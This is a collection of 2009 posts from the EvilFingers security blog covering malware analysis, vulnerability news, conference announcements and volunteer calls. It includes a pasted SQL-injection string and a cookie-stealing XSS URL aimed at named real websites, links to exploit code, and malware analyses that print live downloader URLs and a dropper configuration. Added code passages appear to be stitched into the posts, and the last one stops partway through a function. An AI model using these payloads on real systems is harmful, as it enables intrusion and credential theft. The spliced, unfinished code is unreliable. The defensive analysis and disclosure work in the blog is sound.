1. Go to the web page hosting the applet (the applet can even be made invisible).
2. Accept the certificate warning dialog box that is raised (it is not even a security dialog, just a certificate warning).
3. That's all, you are owned :).

Full Source Code is Released under BSD License.
Enjoy!

Video is done by Arkar WMH.
By v3ss (phyo.arkarlwin@star-nix.net)
StarNix Solutions.

Greetz to : Arkar WMH, Shyaam and Everyone at Evilfingers

More information (Video and the code) can be found HERE.

- EF

New PCAPs Released - XScan PCAP

The XScan PCAP can be found here:

  • XScan PCAP

Check it out when you get a chance.

- EF

MSN Credential Theft - http://zopblob.com/

Hi there,

These days another malicious domain is running, developed specifically to steal MSN credentials. The propagation system is always the same: you receive an offline message from an already infected user on your MSN contact list.

http://{ACCOUNT_NAME}zopblob.com/

The server used is, as usual, lighttpd:

HTTP/1.0 200 OK
Connection: close
X-Powered-By: PHP/4.4.8
Content-type: text/html
Content-Length: 791
Date: Sun, 25 Jan 2009 01:01:51 GMT
Server: lighttpd/1.4.19

and the dissected link appears as:

<html>
<head>
<title>...</title>
</head>
<frameset cols="0,*" frameborder="0">
<frame src="..." name="..."><frame src="..." name="...">
</frameset>

This time we also have a little difference: this time the malicious domain includes tracking functionality:

<script type="text/javascript">
var sc_project=4080201;
var sc_invisible=1;
var sc_partition=49;
var sc_click_stat=1;
var sc_security="0c7fe093";
</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-1033286-4");
pageTracker._trackPageview();
</script>

A domain whois (http://www.networksolutions.com/whois-search/zopblob.com) reveals that the source of this malicious domain is always the same... from Panama:

See you at the next post.. :)

Friday, January 23, 2009

Moral of the day: Jan 23rd, 2009

"Enjoy life when you get a chance. Take some time to appreciate nature."

Gist: Time will run so quickly that you don't get to appreciate the present, if you think only about the future.

Thursday, January 22, 2009

Moral of the day: 22 Jan 2009

"Never fear, because God is here."

Gist: God is inside everyone.

- EF

New Stillsecure Strataguard Release

*** SHAMELESSLY COPIED FROM EMERGINGTHREATS BLOG ***
Stillsecure has been a great contributor to Emerging Threats over the years. They've just released a new version of their Strataguard appliance load.

If you have the time give it a look. There's a free to use version and others with commercial support. They run our rules as well as the VRT and your own. Great system, if you're in the market give it a look! If you've tried it out let us know on the lists how it does. I know they're eager for the feedback.

http://www.stillsecure.com/strataguard/index.php

Matt

*** SHAMELESSLY PASTED FROM EMERGINGTHREATS BLOG ***

Wednesday, January 21, 2009

Firefox 3.0.5 Status Bar Obfuscation / Clickjacking

http://www.milw0rm.com/exploits/7842 shows a PoC of Status Bar Clickjacking in Firefox 3.0.5, published by MrDoug.

function updatebox(evt) {
    mouseX = evt.pageX ? evt.pageX : evt.clientX;
    mouseY = evt.pageY ? evt.pageY : evt.clientY;
    document.getElementById('mydiv').style.left = mouseX - 1;
    document.getElementById('mydiv').style.top = mouseY - 1;
}

is called by a mouse onclick action [onclick="updatebox(event)"].

Check it out.

- EF

Moral of the day: Jan 21st, 2009

"Never lead someone with your words, but lead them by putting your words into action."

Gist: A good leader is never a dictator, but leads his/her team by being a follower.

- EF

    Tuesday, January 20, 2009

    Videos from HITBSecConf2008 - Malaysia released!

    ***************COPIED FROM EMAIL***************
    The videos from HITBSecConf2008 - Malaysia are now available for download!

    Day 1
    =====

    http://thepiratebay.org/torrent/4654588/HITBSecConf2008_-_Malaysia_Videos___Day_1

    Keynote Address 1: The Art of Click-Jacking - Jeremiah Grossman
    Keynote Address 2: Cyberwar is Bullshit - Marcus Ranum

    Presentations:

    - Delivering Identity Management 2.0 by Leveraging OPSS
    - Bluepilling the Xen Hypervisor
    - Pass the Hash Toolkit for Windows
    - Internet Explorer 8 - Trustworthy Engineering and Browsing
    - Full Process Reconstitution from Memory
    - Hacking Internet Kiosks
    - Analysis and Visualization of Common Packers
    - A Fox in the Hen House - UPnP IGD
    - MoocherHunting
    - Browser Exploits: A New Model for Browser Security
    - Time for a Free Hardware Foundation?
    - Mac OS Xploitation
    - Hacking a Bird in The Sky 2.0
    - How the Leopard Hides His Spots - OS X Anti-Forensics Techniques


    Day 2
    =====

    http://thepiratebay.org/torrent/4654974/HITBSecConf2008_-_Malaysia_Videos___Day_2

    Keynote Address 3: Dissolving an Industry as a Hobby - THE PIRATE BAY

    Presentations:

    - Pushing the Camel Through the Eye of a Needle
    - An Effective Methodology to Enable Security Evaluation at RTL Level
    - Remote Code Execution Through Intel CPU Bugs
    - Next Generation Reverse Shell
    - Build Your Own Password Cracker with a Disassembler and VM Magic
    - Decompilers and Beyond
    - Cracking into Embedded Devices and Beyond!
    - Client-side Security
    - Top 10 Web 2.0 Attacks

    ===

    On a related note, the registration for HITBSecConf2009 - Dubai (20th -
    23rd April) is now open!

    http://conference.hitb.org/hitbsecconf2009dubai/

    The Call for Papers (CFP) for HITBSecConf2009 - Malaysia (October 5th -
    8th) will open in March 2009.

    A belated Happy New Year from all of us at Hack in The Box and may all
    your exploits result in root shell! :)

    The HITB Team.

    ***************COPIED FROM EMAIL***************
    - EF

    Moral of the day: Jan 20th, 2008

    "Never wait for a leader, when there is one inside you."

    - EF

    Monday, January 19, 2009

    Vulnerabilities & proofs-of-concept

    This week SecurityFocus reported a number of vulnerabilities in several applications, among which, as usual, Microsoft environments are not missing. Since these security gaps in program design allow attacks of various kinds, it is interesting to see the potential of a vulnerability through proofs-of-concept.

    Office Viewer ActiveX Controls (OCX)
    Office Viewer presents a series of vulnerabilities in the ActiveX controls that let you edit and view Microsoft Office files from your web browser. This gives an attacker the possibility of executing arbitrary code with the privileges of the current user.

    There are a number of PoC on these vulnerabilities:
    http://downloads.securityfocus.com/vulnerabilities/exploits/33245.html
    http://downloads.securityfocus.com/vulnerabilities/exploits/33238_powerpoint.html
    http://downloads.securityfocus.com/vulnerabilities/exploits/33238_office.html
    http://downloads.securityfocus.com/vulnerabilities/exploits/33238_word.html
    http://downloads.securityfocus.com/vulnerabilities/exploits/33222.html
    http://downloads.securityfocus.com/vulnerabilities/exploits/33243-office.html
    http://downloads.securityfocus.com/vulnerabilities/exploits/33243-powerpoint.html
    http://downloads.securityfocus.com/vulnerabilities/exploits/33243-word.html
    http://downloads.securityfocus.com/vulnerabilities/exploits/33243-excel.html


    Microsoft Knowledge Base
    How to prevent the execution of an ActiveX control in IE

    NullSoft Winamp v5.3.2 and later
    Since this version of Winamp there are defects in the processing of mp3 and AIFF (Audio Interchange File Format) files, by which a deliberately manipulated mp3 or AIFF file could cause a buffer overflow that allows an attacker to execute arbitrary code with the privileges of the current user. There is a PoC for this weakness:

    http://downloads.securityfocus.com/vulnerabilities/exploits/33226.pl

    Microsoft Windows Compiled HTML Help Handling Buffer Overflow
    Compiled HTML Help (CHM) is a document format commonly used for help files in Microsoft Windows. By deliberately manipulating a file of this format, a vulnerability in Windows XP SP3 can be exploited to cause a buffer overflow.

    http://downloads.securityfocus.com/vulnerabilities/exploits/33204.pl

    # Jorge Mieres

    Sunday, January 18, 2009

    Today's Update: Jan 18 2009

    Advisories:

    Aditya K Sood has released his most recent advisory on Oracle E-Business Suite, which can be obtained from the following link:

    [HTML] [PDF]

    Tools:

    Kirk McGraw has released the most recent update on Process Memory Dumper [PMD] v1.6, which can be obtained from the following link:

    [Process Memory Dumper v1.6]
    [Process Memory Dumper v1.6 (GUI Mode)- Download Tool]

    Snapshot of PMDv1.6:




    New PCAPs on Scan Traffic releasing today. Kalyana Kumar, our new volunteer is releasing his second pack of PCAPs on XScan traffic.

    - EF

    Saturday, January 17, 2009

    SQL Injection and XSS Vulnerabilities

    Rohit Bansal, an active member of the security research community, has been actively submitting XSS and SQL injection findings to the PacketStormSecurity and XSSed websites.

    He sent us the following stuff for publishing in our blog:

    *** PASTED FROM Rohit Bansal's EMAIL ***

    SQL Injection:

    Vuln: http://othersports.virginmedia.com/minorsports/news.php?id=25418+and+1=0+ and 1=0 Union Select 1 ,2, UNHEX(HEX([visible])) ,4,5,6,7,8,9,10

    XSS:

    http://www.mozillazine.org/talkback.html?article=26260%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cmarquee%3E%3Ch2%3EXSS%20By%20Evilfingers%3Ch2%3E%3C/script%3E

    *** PASTED FROM Rohit Bansal's EMAIL ***

    Disclaimer: EvilFingers community is not responsible for any of the information pasted above. Read our Legal section.

    - EF

    Friday, January 16, 2009

    Update: Analysis of 121.12.173.218

    *** From one of our Analysts ***

    Today, I became aware of a new community portal at http://mwm.rising.com.cn/ [via: http://www.thedarkvisitor.com/2009/01/new-interactive-website-tracks-malicious-programs-in-china/].

    It provides some interesting statistics as well as top 5 malicious domains. One of those domains serves exploits that connect to the prior EvilFingers analysis [at http://evilfingers.blogspot.com/2009/01/analysis-of-12112173218.html]. Specifically, I used the jsunpack.jeek.org analysis tool to identify the purpose of the JavaScript and identify several malicious executables.

    Analysis of the iframes at
    alimcma. 3322.org/b107224/b10.htm [analysis at http://jsunpack.jeek.org/dec/go?url=alimcma.3322.org_b107224_b10.htm]
    alimcma .3322.org/a0076159/a07.htm [analysis at http://jsunpack.jeek.org/dec/go?url=alimcma.3322.org_a0076159_a07.htm]

    shows one executable at qq.18i16.net_exe1_ce.css:
    Sections ( PSÿÕ«ëçà @üV@ wB@ü @ )
    File: MS-DOS executable, MZ for MS-DOS
    Packer: Upack V0.37 -> Dwing,Upack v0.399 -> Dwing,
    Strings:UNPACKED %s\Down_Temp\%d.exe
    Strings:UNPACKED http://121.12.173.218/w/ce.txt
    Size: 2596 bytes,
    MD5: d3e56ea1a1a5f8d7e21cae20a4d63805

    From that executable, we can see that ce.txt is a downloader, and hxxp://121.12.173.218/w/ce.txt reveals additional executables for us to analyze.
    http://jsunpack.jeek.org/dec/go?url=121.12.173.218_baidu.exe
    http://jsunpack.jeek.org/dec/go?url=121.12.173.218_tan_ce.exe

    *** From one of our Analysts ***

    http://jsunpack.jeek.org/dec/go?url=121.12.173.218_baidu.exe:

    Sections ( PS�ի��� @@�C �eC�@ )
    File: MS-DOS executable, MZ for MS-DOS
    Packer: Upack V0.37 -> Dwing,
    Strings:UNPACKED C:\%08X
    Strings:UNPACKED XsMenu.exe
    Strings:UNPACKED .exe
    Strings:UNPACKED SoftWare\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
    Strings:UNPACKED human.exe
    Strings:UNPACKED \human.exe
    Strings:UNPACKED \winhlp32.exe
    Strings:UNPACKED \mmc.exe
    Strings:UNPACKED %windir%\system32\userinit.exe
    Strings:UNPACKED %windir%\system32\mmc.exe
    Strings:UNPACKED http://121.12.173.218/uu
    Strings:UNPACKED %windir%\hh.exe
    Strings:UNPACKED %windir%\system32\calc.exe
    Strings:UNPACKED %windir%\system32\netstat.exe
    Strings:UNPACKED %windir%\system32\edit.com
    Strings:UNPACKED %windir%\system32\command.com
    Strings:UNPACKED %windir%\system32\ftp.exe
    Strings:UNPACKED %windir%\winhlp32.exe
    Strings:UNPACKED %windir%\winhelp.exe
    Strings:UNPACKED %windir%\twunk_32.exe
    Strings:UNPACKED %windir%\twunk_16.exe
    Strings:UNPACKED %s\data.exe
    Strings:UNPACKED %s\pack_%d.exe
    Strings:UNPACKED %s\kill.exe
    Strings:UNPACKED %windir%\system32\winhlp32.exe
    Strings:UNPACKED c:\windows\main.exe
    Strings:UNPACKED ntoskrnl.exe
    Size: 21608 bytes,
    MD5: e8d700f2af2a2048e900e7a0b17c0ef8

    http://jsunpack.jeek.org/dec/go?url=121.12.173.218_tan_ce.exe:

    Sections ( .nsp0 .nsp1 .nsp2 )
    File: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
    Packer: NsPack 2.9 -> North Star,
    Size: 5368 bytes,
    MD5: f095d29bc1f6d49bdc295e19dae07d1a

    Tsk, tsk, tsk... 121.12.173.218 is so naughty and their ISP still lets them do it...

    - EF

    Hack In The Box Security Conference 2009 - Dubai

    When it comes to InfoSec and hacking, HITB has been one of the top-notch conferences. Here is their next conference @ Dubai.

    *** Pasted Snippet ***

    Welcome to the official homepage of HITBSecConf2009 - Dubai. The main aim of the HITBSecConf conference series is to create a truly technical and deep knowledge event in order to allow you to learn first hand on the security threats you face in today's super connected world. The HITBSecConf platform is used to enable the dissemination, discussion and sharing of critical network security information.

    Presented by respected members of both the mainstream network security arena as well as the underground or black hat community, our events routinely highlight new and ground-breaking attack and defense methods that have not been seen or discussed in public before. HITBSecConf2009 - Dubai will be our 3rd conference in the UAE and is expected to attract over 200 delegates from the GCC, Europe, North America and the Asia Pacific region. Come and learn from some of the leading experts in the network security arena.

    HITBSecConf2009 - Dubai will also see our highly popular attack-only Capture The Flag competition being organized once again. This year's contest will also include an additional binary reversing challenge as well! We believe HITBSecConf is an ideal platform for leading network security vendors to not only meet with some of the leading network security specialists but to also showcase their own technology and solutions with the public as well.

    Venue: Sheraton Dubai Creek,
    Baniyas/Creek Road,
    Dubai, UAE

    Technical Training - DAY 1 and DAY 2
    Date: 20th and 21st April 2009
    Time: 0900 - 1700

    TECH TRAINING 1 - Web Application Security - Threats and Countermeasures
    TECH TRAINING 2 - 802.11 Ninjitsu
    TECH TRAINING 3 - The Exploit Laboratory 3.0

    Conference DAY 1 and DAY 2
    Date: 22nd and 23rd April 2009
    Time: 0900 - 1700

    Dual Track Conference
    Capture The Flag (CTF)

    *** Pasted Snippet ***

    We are proud to partner with HITB conferences as one of their supporting organizations.

    - EF

    Thursday, January 15, 2009

    Analysis of 121.12.173.218

    DISCLAIMER:
    KINDLY DO NOT VISIT ANY OF THE OBFUSCATED LINKS LISTED HERE, AS THEY WILL AFFECT YOUR SYSTEM. WE ARE NOT RESPONSIBLE OR IN CHARGE OF ANY POSSIBLE EFFECTS IF YOU ARE CLICKING ON THE FOLLOWING DESPITE THIS WARNING. READ OUR LEGAL SECTION BEFORE TRYING TO CONTACT US. THE DATA IN THIS SECTION OR IN ANY SECTION OF WWW.EVILFINGERS.COM ARE SOLELY FOR EDUCATIONAL PURPOSE.


    121.12.173.218 has been really mischievous.

    The following are some of the EXEs found during analysis:
    hxxp://121.12.173.218/6666.txt
    and
    hxxp://121.12.173.218/tan/ms.exe
    Sections ( .nsp0 .nsp1 .nsp2 )
    File: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
    Packer: NsPack 2.9 -> North Star,
    Size: 5368 bytes,
    MD5: 45763bb0ea1fcd247a52bacd3124ea35


    Anubis Analysis Report for 6666.txt

    Anubis Analysis Report for ms.exe

    6666.txt calls for a multitude of bad guys to continue this process:


    6666.txt pulls in 35 EXEs of assorted malware species:
    [file]
    open=y
    url1=hxxp://a.baidu-6661.com/newadsadsxk/newads01.exe
    url2=
    url3=hxxp://a.baidu-6661.com/newadsadsxk/newads03.exe
    url4=
    url5=hxxp://a.baidu-6661.com/newadsadsxk/newads05.exe
    url6=hxxp://a.baidu-6661.com/newadsadsxk/newads06.exe
    url7=hxxp://a.baidu-6661.com/newadsadsxk/newads07.exe
    url8=hxxp://a.baidu-6661.com/newadsadsxk/newads08.exe
    url9=hxxp://a.baidu-6661.com/newadsadsxk/newads09.exe
    url10=hxxp://a.baidu-6661.com/newadsadsxk/newads10.exe
    url11=
    url12=hxxp://a.baidu-6661.com/newadsadsxk/newads12.exe
    url13=hxxp://a.baidu-6661.com/newadsadsxk/newads13.exe
    url14=hxxp://a.baidu-6661.com/newadsadsxk/newads14.exe
    url15=hxxp://a.baidu-6661.com/newadsadsxk/newads15.exe
    url16=hxxp://a.baidu-6661.com/newadsadsxk/newads16.exe
    url17=hxxp://a.baidu-6661.com/newadsadsxk/newads17.exe
    url18=hxxp://a.baidu-6661.com/newadsadsxk/newads18.exe
    url19=hxxp://a.baidu-6661.com/newadsadsxk/newads19.exe
    url20=hxxp://a.baidu-6661.com/newadsadsxk/newads20.exe
    url21=hxxp://a.baidu-6661.com/newadsadsxk/newads21.exe
    url22=hxxp://a.baidu-6661.com/newadsadsxk/newads22.exe
    url23=
    url24=hxxp://a.baidu-6661.com/newadsadsxk/newads24.exe
    url25=hxxp://a.baidu-6661.com/newadsadsxk/newads25.exe
    url26=hxxp://a.baidu-6661.com/newadsadsxk/newads26.exe
    url27=hxxp://a.baidu-6661.com/newadsadsxk/newads27.exe
    url28=hxxp://a.baidu-6661.com/newadsadsxk/newads28.exe
    url29=hxxp://a.baidu-6661.com/newadsadsxk/newads29.exe
    url30=hxxp://a.baidu-6661.com/newadsadsxk/newads30.exe
    url31=
    url32=hxxp://a.baidu-6661.com/newadsadsxk/newads32.exe
    url33=hxxp://a.baidu-6661.com/newadsadsxk/newads33.exe
    url34=
    url35=hxxp://a.baidu-6661.com/newadsadsxk/newads35.exe
    count=35

    Analysis of one of the files that 6666.txt calls (hxxp://a.baidu-6661.com/newadsadsxk/newads01.exe)

    Sections ( .Upack .rsrc )
    File: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
    Packer: Upack V0.37 -> Dwing,Upack_Patch or any Version -> Dwing,WinUpack v0.39 final (relocated image base) -> By Dwing (c)2005 (h2),
    Strings:UNPACKED expl$aorer.exe
    Strings:UNPACKED /cczongxz/shpost5.asp
    Strings:UNPACKED /test/erge1128/post.asp
    Strings:UNPACKED /cczongxz/mibao.asp
    Strings:UNPACKED shcsrss.exeEvent
    Strings:UNPACKED svchost.exe
    Strings:UNPACKED csrss.exe
    Strings:UNPACKED csrss.exeMutex
    Strings:UNPACKED http://$a%s$a:%d%s?%s
    Strings:UNPACKED 21$a2.103$a.11.59 passpo$art.wanmei.com
    Strings:UNPACKED 212.1$a03.11.59 re$ag.163.c$aom
    Strings:UNPACKED 21$a2.103.11.59 sde.ga$ame.sohu.com
    Strings:UNPACKED 212.10$a3.11.59 ac$acount.ztgame.com
    Strings:UNPACKED 212.103.11.59 pwd.s$ado.com
    Strings:UNPACKED 2$a12.103.11.59 r$aeg.91.com
    Strings:UNPACKED 21$a2.103$a.11.59 pass.kin$agsoft.com
    Strings:UNPACKED 212$a.103.11.59 pa$assport.y$auyan.com
    Strings:UNPACKED my.exe
    Strings:UNPACKED r05022.exe
    Strings:UNPACKED rundll32.exe
    Size: 13083 bytes,
    MD5: 4375b512ce566f970d51c7ff75ae3846

    Anubis Report for hxxp://a.baidu-6661.com/newadsadsxk/newads01.exe

    This is of course old news for many, based on ShadowServer reports and other sources that have been warning about the IE7 0-day exploit. The interesting part is that this site is still active and still serving this malware...

    - EF

    Simpler the better...

    www.MalwareAnalytics.com - The science of Malware Analysis.


    Coming soon... If you wish to volunteer or contribute to this division of EvilFingers, and you meet the following constraints, kindly email us at contact.fingers @ gmail.com:

    You are experienced in this field (directly or indirectly) and you can do tasks autonomously without any assistance, once the project or task is assigned and explained to you.

    You are willing to submit your real profile to us so we can understand your experience (LinkedIn, for example). We guarantee not to release it if you do not want us to.

    You agree NOT to bring in your corporate work or corporate information into our team, because we definitely do not wish to get involved with any type of corporate infringements, copyrights or intellectual property issues.

    Your ideas that you bring in for the team will be solely yours and not your company's tool or something of that sort.

    You will dedicate some time for some serious contribution/volunteering, since you understand that everyone in the team is a volunteer and we are all working towards raising the par of information security.

    You will cooperate with other volunteers in the same team, without bothering others or doing things that would increase their contribution time or load them with your work.

    You agree to submit your work, both source and all files researched including the volunteering schedule, and anything else that you have collected, created or researched during the process.



    And more...

    Contact us if you have any questions, reviews or anything at all. contact.fingers @ gmail.com [Because GMAIL Rocks!!!]...

    - EF

    Globalization: Pros & Cons...

    Globalization is the term used for outsourcing projects and working with multinational companies. People look for instant cash in exchange for work, and since globalization started promising such deals, people did not see, or did not calculate in advance, the possibility of such failures.

    When you depend on someone or something for a long term, and if that someone or something fails, so will you. Theory of transitivity applies to all such situations.

    B depends on A

    IF A ->(tends to) Success THEN B -> Success too.
    IF A -> Failure THEN B -> Failure too.

    How come, this small logic was never thought about until people saw failure? This does not mean Globalization should be stopped. This just means that there are both Pros & Cons for everything, just like 2 sides of the same coin.

    - EF

    Video Section: Call for Volunteers

    We are looking for people who would be willing to make our video section active. We are coming up with 2 possible ways to contribute to our video section. One is to come up with a weekly and a monthly theme, where our volunteers would be able to pick our theme for the week or the month and make their videos fall under that umbrella. In the other case, we would also have a generic video section running parallel to the theme, with category-based listings, so your video would be listed under the various categories if not under the theme. Even if there is no category for your video currently, we promise to make one for you.

    We also would be submitting our quality videos to our partner www.TheAcademyPro.com and their Home Edition too, depending on the category of the video. Please do not hesitate to shoot us an email at contact.fingers @ gmail.com[BECAUSE GMAIL ROCKS!!!] for any further questions.

    - EF

    Wednesday, January 14, 2009

    Malware attack via Internet

    Long gone are the typical actions of the old computer viruses, whose harmful infection methods consisted of specific attack modules propagated via some diskette. At this point in history the situation has changed radically, and malware has found in the Internet an ideal medium for channelling larger and more effective attacks.

    In this respect, one of the most used methods consists of executing malicious code transparently to the user, at the precise moment they access a particular website. One of the most used techniques is the Drive-by-Download.

    The attack is generally channelled through the injection of iframe tags into the body of the HTML code, which, transparently and in parallel with the loading of the compromised page, open another page that contains one or more obfuscated scripts.

    Each of these malicious scripts hides one or more exploits that take charge of searching the victim's machine for the specific vulnerability for which they were developed.

    When the user accesses the compromised page they may see, for example, a single dot in the whole browser window. Something like the following:


    But when the page's source code is viewed, the injected code shows, similar to the following:

    However, it is not all bad omens, because there are countermeasures that mitigate this type of attack effectively, and as simply as reading this text. The countermeasure is simply to keep the computing environment up to date with security updates.

    # Jorge Mieres
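    As an added example (not code from the post or from EvilFingers), a small Python checker that applies the pattern described above to a page's HTML: it flags iframe tags that are hidden, zero-sized or pushed off-screen and reports whether they pull content from a host other than the page's own. The sample page and its host names are constructed for the demonstration.

```python
"""Flag iframes that match the drive-by-download injection pattern: a frame
the visitor cannot see (hidden, tiny or off-screen) that loads a page from
another host. Heuristic only; runs offline on constructed input."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (not from the post): a visible "dot", an injected
# invisible iframe, a legitimate embedded player and an off-screen iframe.
SAMPLE_HTML = """<html><body>.
<iframe src="http://bad-host.invalid/b10.htm" width="0" height="0"
        style="display:none"></iframe>
<iframe src="http://www.example.com/player" width="640" height="360"></iframe>
<iframe src="http://other-host.invalid/a07.htm"
        style="position:absolute; top:-9999px"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in the document."""

    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.frames.append({name.lower(): (value or "") for name, value in attrs})


def _pixels(value):
    """Parse a width/height attribute such as '0', '1px' or ' 640 '; None if absent."""
    match = re.match(r"\s*(\d+)", value or "")
    return int(match.group(1)) if match else None


def _is_same_site(frame_host, page_host):
    frame_host, page_host = frame_host.lower(), page_host.lower()
    return frame_host == page_host or frame_host.endswith("." + page_host)


def suspicious_iframes(html, page_host):
    """Return [(src, [reasons]), ...] for iframes that look injected.

    A frame is reported only if the visitor cannot see it; a visible frame is
    treated as a normal embed even when it points at another host.
    """
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for frame in collector.frames:
        reasons = []
        style = re.sub(r"\s+", "", frame.get("style", "")).lower()
        width, height = _pixels(frame.get("width")), _pixels(frame.get("height"))
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by CSS")
        if re.search(r"(?:left|top):-\d+", style):
            reasons.append("positioned off-screen")
        if any(dim is not None and dim <= 1 for dim in (width, height)):
            reasons.append("zero- or one-pixel frame")
        if not reasons:
            continue
        src = frame.get("src", "")
        host = urlparse(src).hostname or ""
        if host and not _is_same_site(host, page_host):
            reasons.append("loads third-party host " + host)
        findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for src, reasons in suspicious_iframes(SAMPLE_HTML, "www.example.com"):
        print(src, "->", "; ".join(reasons))
```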

    Tuesday, January 13, 2009

    Vulnerabilities in SMB Could Allow Remote Code Execution (958687): MS09-001

    ******PASTED FROM OFFICIAL SITE******

    Executive Summary
    This security update resolves two privately reported vulnerabilities and one publicly disclosed vulnerability in Microsoft Server Message Block (SMB) Protocol. The vulnerabilities could allow remote code execution on affected systems. An attacker who successfully exploited these vulnerabilities could install programs; view, change, or delete data; or create new accounts with full user rights. Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.

    This security update is rated Critical for all supported editions of Microsoft Windows 2000, Windows XP, and Windows Server 2003, and Moderate for all supported editions of Windows Vista, and Windows Server 2008. For more information, see the subsection, Affected and Non-Affected Software, in this section.

    The security update addresses the vulnerabilities by validating the fields inside the SMB packets. For more information about the vulnerabilities, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.

    Recommendation. Microsoft recommends that customers apply the update immediately.

    Known Issues. None

    ******PASTED FROM OFFICIAL SITE******

    - EF

    Possible questions for a silent Patch Tuesday

    Microsoft has announced 1 critical bulletin that can be found at http://www.microsoft.com/technet/security/Bulletin/MS09-jan.mspx.

    Does this mean we are safe?
    OR
    Does this mean that MS is releasing patches silently, without releasing details to the general public so that they know how things work?

    It makes sense in both cases, since not everyone would know every single thing they are vulnerable to, especially when they are concentrating on how to expand further by creating a new technology and a new OS when they do not even have time to fix what is vulnerable in their past OS and components.

    Secondly, it is their product and hence they have license to update and fix their product without making a public disclosure of it.

    Hence, it makes sense either way.

    - EF

    Monday, January 12, 2009

    Malware Analytics


    www.MalwareAnalytics.(com|org|net) coming soon... So far PE analysis (1% of Malware Analytics) is complete and the team is currently working on other stuff (as seen below):



    Kirk McGraw is responsible for Rootkit research and Giuseppe Bonfa is running the Malware research.

    - EF

    Saturday, January 10, 2009

    Security in Web browsers

    Late last year the EvilFingers community disclosed a number of vulnerabilities in the Google Chrome web browser, such as URI metacharacter obfuscation, by which an attacker could manipulate the browser's functionality and redirect requests, or the mishandling in the "chrome.dll" library that allows the browser to be crashed, among others. While these remain PoCs, they reflect the level of vulnerability of web applications.

    It seems that Google responded to the call and, some time ago, released, by the hand of Michal Zalewski, the Pole who disclosed many of the vulnerabilities found in Internet Explorer and Firefox (and surely in Chrome too), a Browser Security Handbook.

    The handbook explains a great many of the security features of the most common and most used browsers and is excellent reference material.

    # Jorge Mieres

    Kris Kaspersky Publication Translation

    Daniel is our new Russian translator who is actively working with us to preliminarily help with the publication translation and later work on translating our entire EN site to RU for www.EvilFingers.ru.

    We need some English-speaking volunteers who are good at reviewing articles, to ensure that the translation makes sense in English; this was requested by Daniel himself. Hence, if you would like to volunteer for this particular task, you are most welcome to do so.

    Contact us at contact.fingers @ gmail.com if you have any further questions.

    - EF

    Friday, January 9, 2009

    NtSetDebugFilterState as Anti-Dbg Released

    Hi,

    We have released a paper by Giuseppe 'Evilcry' Bonfa' on reverse engineering NtSetDebugFilterState and using it as an anti-debugging trick.

    You can reach it here:

    http://evilfingers.com/publications/research_EN/NtSetDebugFilterState.pdf

    Regards

    Commonly exploited security weaknesses

    There are many attacks that a computing environment can suffer for the sole reason of being part of the World Wide Web, so it is necessary to centralize all efforts on improving, in a strategic and proactive manner, every aspect that represents a potential point of attack, without neglecting the most trivial ones.

    For this reason, we have written a new paper that explains the importance of attending to every aspect of security with the same level of acuity, however common it may seem.

    In the Publications section of EvilFingers.com you will find this new resource in Spanish, or, if you wish, you can download it from here.

    For those who do not fully master the Spanish language, it will soon also be available in English.

    # Jorge Mieres

    We give up...

    After almost 3 years of consistent argument with the corporate world (private and government sectors) over the word "Evil" in www.EvilFingers.com, we have finally given up and decided it is not worth arguing any more.

    We have now registered www.SecInternals.com as the professional front of www.EvilFingers.com, to help the corporate world with free, community-based security research. The site should be up pretty soon with a commercial design...

    Stay in touch for further updates, or contact us at contact.fingers @ gmail.com with any questions.

    - EF

    How to create a dll

    If you are interested in this post, I assume that you know what a DLL is; if not, you can find a definition here.

    Below is a minimal skeleton of what you need to create a DLL.

    There are two files: mylib.c (which contains your functions) and mylib.def, which lists the functions you want to make accessible to other programs (the exported functions).

    mylib.c
    #include <stdio.h>
    #include <windows.h>

    /* Exported function: listed in mylib.def so other programs can call it.
       /Gz below makes __stdcall the default, so the explicit keyword just documents it. */
    __declspec(dllexport) int __stdcall myFunc(void)
    {
        printf("Text from my dll\n");
        return 0;
    }

    /* Entry point called by the loader on process/thread attach and detach.
       It is not exported; it must have this exact signature and return TRUE on success. */
    BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
    {
        return TRUE;
    }

    The mylib.def will contain:
    LIBRARY mylib
    EXPORTS
    myFunc

    Now you need to compile your mylib.c file with the following switches:
    cl mylib.c /LD /O2 /Gz /GD /W3 /link advapi32.lib /DLL /NOLOGO /DEF:mylib.def /RELEASE

    Enjoy :)

    - From ExpertSec
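As an added check (example code, not part of the ExpertSec post): once mylib.dll is built, you want to confirm that mylib.def really exported myFunc under its plain, undecorated name, which is what dumpbin /exports shows. The Python below walks the PE export directory by hand; build_sample_image is a constructed fixture, not a real DLL, so the parser can be exercised offline.

```python
import struct

def rva_to_offset(sections, rva):
    """Map a relative virtual address onto a file offset via the section table."""
    for va, raw_ptr, size in sections:
        if va <= rva < va + size:
            return rva - va + raw_ptr
    raise ValueError("RVA 0x%x lies outside every section" % rva)

def list_exports(image):
    """Return the function names in the export directory of a PE32 or PE32+ image."""
    pe = struct.unpack_from("<I", image, 0x3C)[0] if image[:2] == b"MZ" else -1
    if pe < 0 or image[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsections, opt_size = struct.unpack_from("<H12xH", image, pe + 6)
    opt = pe + 24                                     # optional header follows COFF header
    magic = struct.unpack_from("<H", image, opt)[0]   # 0x10B = PE32, 0x20B = PE32+
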